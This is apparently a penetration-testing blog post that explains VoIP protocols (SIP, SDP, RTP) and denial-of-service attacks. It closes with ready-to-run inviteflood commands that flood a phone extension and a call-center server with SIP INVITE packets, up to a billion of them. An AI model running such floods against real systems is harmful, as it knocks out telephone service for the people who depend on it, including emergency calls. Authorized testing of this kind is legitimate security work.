Penetration Testing

Perform DOS Attack on VOIP Network

Most of the security assessment engagements performed in a production environment, explicitly prohibit the use of any tools and/or methods that would cause a Denial-Of-Service(DoS) condition. Nevertheless, there are some cases that you will be allowed (surprisingly) to launch DoS attacks! Even then, in cases where your hands are free, most likely is that the client does not expect to succeed in launching a Denial of Service attack bu using only your laptop.

Long story short, in this post we will see how is it feasible to launch a Denial of Service attack on a VoIP network by using just your laptop!

Voice over IP (VoIP)

Voice over Internet Protocol (VoIP), also called IP telephony, is a method and group of technologies for the delivery of voice communications and multimedia sessions over Internet Protocol (IP) networks, such as the Internet. The terms Internet telephony, broadband telephony, and broadband phone service specifically refer to the provisioning of communications services (voice, fax, SMS, voice-messaging) over the public Internet, rather than via the public switched telephone network (PSTN), also known as plain old telephone service (POTS). The steps and principles involved in originating VoIP telephone calls are similar to traditional digital telephony and involve signaling, channel setup, digitization of the analog voice signals, and encoding. Instead of being transmitted over a circuit-switched network, the digital information is packetized and transmission occurs as IP packets over a packet-switched network. They transport media streams using special media delivery protocols that encode audio and video with audio codecs and video codecs. Various codecs exist that optimize the media stream based on application requirements and network bandwidth; some implementations rely on narrowband and compressed speech, while others support high-fidelity stereo codecs.

Voice over IP has been implemented in various ways using both proprietary protocols and protocols based on open standards. These protocols can be used by a VoIP phone, special-purpose software, a mobile application or integrated into a web page. VoIP protocols include:

  • Session Initiation Protocol (SIP), connection management protocol developed by the IETF.
  • Real-time Transport Protocol (RTP), transport protocol for real-time audio and video data
  • Real-time Transport Control Protocol (RTCP), sister protocol for RTP providing stream statistics and status information
  • Secure Real-time Transport Protocol (SRTP), encrypted version of RTP
  • HiPath Feature Access (HFA)
  • etc..

Session Description Protocol (SDP)

The Session Description Protocol (SDP) is a format for describing streaming media communications parameters. SDP is used for describing multimedia communication sessions for the purposes of session announcement, session invitation, and parameter negotiation. SDP does not deliver any media by itself but is used between endpoints for negotiation of media type, format, and all associated properties. The set of properties and parameters are often called a session profile. It is designed to be extensible to support new media types and formats. SDP found uses in conjunction with Real-time Transport Protocol (RTP), Real-time Streaming Protocol (RTSP), Session Initiation Protocol (SIP) and even as a standalone format for describing multicast sessions.

Session Initiation Protocol (SIP)

The Session Initiation Protocol (SIP) is a signaling protocol used for initiating, maintaining, and terminating real-time sessions that include voice, video and messaging applications. SIP is used for signaling and controlling multimedia communication sessions in applications of Internet telephony for voice and video calls, in private IP telephone systems, in instant messaging over Internet Protocol (IP) networks as well as mobile phone calling over LTE (VoLTE). The protocol defines the specific format of messages exchanged and the sequence of communications for cooperation of the participants. SIP is a text-based protocol, incorporating many elements of the Hypertext Transfer Protocol (HTTP) and the Simple Mail Transfer Protocol (SMTP).[2] A call established with SIP may consist of multiple media streams, but no separate streams are required for applications, such as text messaging, that exchange data as payload in the SIP message. SIP works in conjunction with several other protocols that specify and carry the session media. Most commonly, media type and parameter negotiation and media setup are performed with the Session Description Protocol (SDP), which is carried as payload in SIP messages. SIP is designed to be independent of the underlying transport layer protocol, and can be used with the User Datagram Protocol (UDP), the Transmission Control Protocol (TCP), and the Stream Control Transmission Protocol (SCTP). For secure transmissions of SIP messages over insecure network links, the protocol may be encrypted with Transport Layer Security (TLS). For the transmission of media streams (voice, video) the SDP payload carried in SIP messages typically employs the Real-time Transport Protocol (RTP) or the Secure Real-time Transport Protocol (SRTP).

Real-time Transport Protocol (RTP)

The Real-time Transport Protocol (RTP) is a network protocol for delivering audio and video over IP networks. RTP is used in communication and entertainment systems that involve streaming media, such as telephony, video teleconference applications including WebRTC, television services and web-based push-to-talk features. RTP typically runs over User Datagram Protocol (UDP). RTP is used in conjunction with the RTP Control Protocol (RTCP). While RTP carries the media streams (e.g., audio and video), RTCP is used to monitor transmission statistics and quality of service (QoS) and aids synchronization of multiple streams. RTP is one of the technical foundations of Voice over IP and in this context is often used in conjunction with a signaling protocol such as the Session Initiation Protocol (SIP) which establishes connections across the network.

Denial-of-service attack (DoS)

A denial-of-service attack (DoS attack) is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled. A DoS attack is analogous to a group of people crowding the entry door of a shop, making it hard for legitimate customers to enter, thus disrupting trade.

InviteFlood – SIP/SDP INVITE message flooding over UDP/IP

A tool to perform SIP/SDP INVITE message flooding over UDP/IP to perform DOS Attack. This tool can be utilized to flood a target with INVITE Request Messages.

Attacking a single device

The following attack scenario will just call the internal phone number 2020, ten (10) times.

sudo inviteflood eth0 2020 -a "Tom" 10
  • eth0: interface
  • 2020: internal user phone number
  • device IP address
  • -a “Tom”: Alias
  • 10: using 10 packets

Attacking a Call Center solution

If you try to launch the following attack scenario against a call center server and attempt to scan the port 5060 on the server during the attack, using the nmap tool, you will notice that the port is reported as closed or filtered. While this attack lasts, you could try to make any internal phone calls.. 🙂

sudo inviteflood eth0 2001 -a "Tom" 1000000000
  • eth0: interface
  • 2001: any internal user phone number (not necessarily an existing one)
  • Call Center Solution Management Server
  • -a “Tom”: Alias
  • 1000000000: using 1000000000 packets